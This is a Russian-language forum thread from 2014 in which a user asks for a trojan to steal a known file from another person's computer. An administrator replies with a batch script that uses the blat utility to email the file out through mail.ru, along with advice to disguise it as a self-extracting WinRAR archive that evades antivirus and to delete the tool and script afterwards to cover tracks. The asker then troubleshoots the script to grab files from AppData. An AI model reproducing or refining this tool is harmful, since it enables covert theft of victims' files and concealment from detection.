Кто знает троян для похищения файлов

Тема в разделе "Трояны и шпионские программы", создана пользователем MIXA066, 9 авг 2014.

↑ ↓
  1. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Всем привет, недавно понадобилось стащить один файл с компьютера.
    Я знаю точное месторасположение файла его название и расширение, но никак не могу найти нигде нормальный троян этот или аналогчиный, (скрин внизу) если есть у кого, поделитесь пожалуйста :D.

    [​IMG]
     
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Предлагаю сделать самому при помощи батника, но понадобится специальная утилита blat !

    Вот пример батника с прогой blat отправки файл через mail.ru:

    Код:
    @echo on
    set eMail
    =my@mydomain.ru
    set femail
    =myemail*********
    set subj=-"TEMA PISMA"
    set server=-server smtp.mail.ru
    set username
    =myemail
    set password
    =mypassword
    set debug
    =-debug -log blat.log -timestamp
    set file
    =cube.log
     
    blat bodytxt 
    -to %eMail% -%femail% -%username% -pw %password% %subj% %server% -attacht %file%
    pause

    -------
    eMail - кому
    femail - от какого ящика на mail.ru отправляется
    в body.txt можно поместить текст письма
    cube.log - отправляемый файл
    -attacht - означает отправка текстового файла
    -attach - бинарного файла

    Вместо cube.log вписать можно любой файл...

    Склеить в экзешник можно при помощи самораспаковывающиеся архива, также можно замоскировать его под любой файл, рекомендую делать в винраре, т.к. его не палит АВ, удачи ! ;)
     
    • Мне нравится Мне нравится x 3
  3. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Cпасибо попробую​
     
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    • Мне нравится Мне нравится x 1
  5. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    а как там указывать ну путь к файлу
     
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Ну тут два варианта, первый если будешь маскировать в самораспаковывающийся архив, то достаточно распакавать в папку с нужным файлом и он его подцепит...

    Второй вариант, вот так set file=C:\cube.log

    Ну и не забывать про:
    -attacht - означает отправка текстового файла
    -attach - бинарного файла
     
    • Мне нравится Мне нравится x 1
  7. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Забыл сказать, не забывайте заметать следы, т.е. удаления всего этого дела после отправки, пример:
    Код:
    DEL //"Blat.exe" #Удалит blat.exe
    Del //%#Удалит наш батник
    Как-то так ! ;)
     
    • Мне нравится Мне нравится x 1
  8. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Спасибо большое завтра буду тестировать :D
     
  9. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    А надо что бы у пользователя утилита blat стояла? Ну на компьютере? Или это как компилятор делает автономные exe'шники
    ----
    А вот нашел
    Как я понял надо склеивать винраром батник с blat.exe и указывать месторасположение
    ---------
    chdir c:\win32 вставил вначале батника (путь к распакованной утилите), либо распаковывать в одну директорию
    ну и опечатка у тебя в коде
    blat body.txt -to %eMail% -f %femail% -u %username% -pw %password% %subj% %server% -attacht %file%
    если кто-то будет пользоваться там точки нет :D
     
  10. MIXA066 Уважаемый пользователь
    MIXA066
    Ответить в чате

    Форумчанин

    Регистрация:
    18.05.2014
    Сообщения:
    380
    Симпатии:
    165
    Пол:
    Мужской
    Репа:
    +176 / 1 / -0
    Ну все вроде работает, но вот допустим если указываю путь C:\login все нормально качает
    А если %AppData%/Roaming/login то не работает, подскажите что не так :D может из-за имени пользователя русского?
     

Поделиться этой страницей